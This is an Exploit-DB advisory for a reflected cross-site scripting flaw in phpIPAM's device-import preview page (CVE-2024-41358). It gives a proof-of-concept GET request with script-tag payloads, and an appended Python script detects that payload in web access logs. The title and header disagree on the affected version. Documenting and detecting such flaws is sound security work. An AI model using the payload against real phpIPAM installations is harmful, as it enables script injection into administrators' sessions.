[webapps] phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
phpIPAM 1.6 has a reflected XSS vulnerability: an attacker can execute script code through crafted malicious URL parameters, affecting system security (CVE-2024-41358). 2025-12-2 00:0:0 Author: www.exploit-db.com

# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1 
# Tested on: Windows
# CVE : CVE-2024-41358


Proof Of Concept
GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue
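
Detection sketch for the request above, as an added example that is not part of the original advisory or of phpIPAM: it scans web access logs for requests to the same endpoint where markup characters appear in the `expfields` value or inside the name of an `importFields__` parameter, which value-only filters miss. The combined log format, the function names and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint and parameter names come from the proof of concept on this page.
ENDPOINT = "/app/admin/import-export/import-devices-preview.php"
# Characters needed to break out of an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")
# Request field of a common/combined format access log (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Nov/2025:10:00:00 +0000] "GET /app/admin/import-export/'
    'import-devices-preview.php?filetype=csv&expfields=hostname HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/Nov/2025:10:00:05 +0000] "GET /app/admin/import-export/'
    'import-devices-preview.php?&filetype=anyValidFiletype'
    '&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E'
    '&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue'
    ' HTTP/1.1" 200 734',
    '192.0.2.12 - - [25/Nov/2025:10:00:09 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]

def suspicious_params(target):
    """Return (where, name, value) for decoded parameters carrying markup."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return []
    hits = []
    # parse_qsl percent-decodes both names and values and skips empty pairs.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "expfields" and MARKUP.search(value):
            hits.append(("value", name, value))
        # The second injection point is the parameter *name*, not its value.
        if name.startswith("importFields__") and MARKUP.search(name):
            hits.append(("name", name, value))
    return hits

def scan(log_lines):
    """Return (line_number, where, name, value) for every suspicious parameter."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            for hit in suspicious_params(match.group(1)):
                findings.append((lineno, *hit))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
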
            

Source: https://www.exploit-db.com/exploits/52441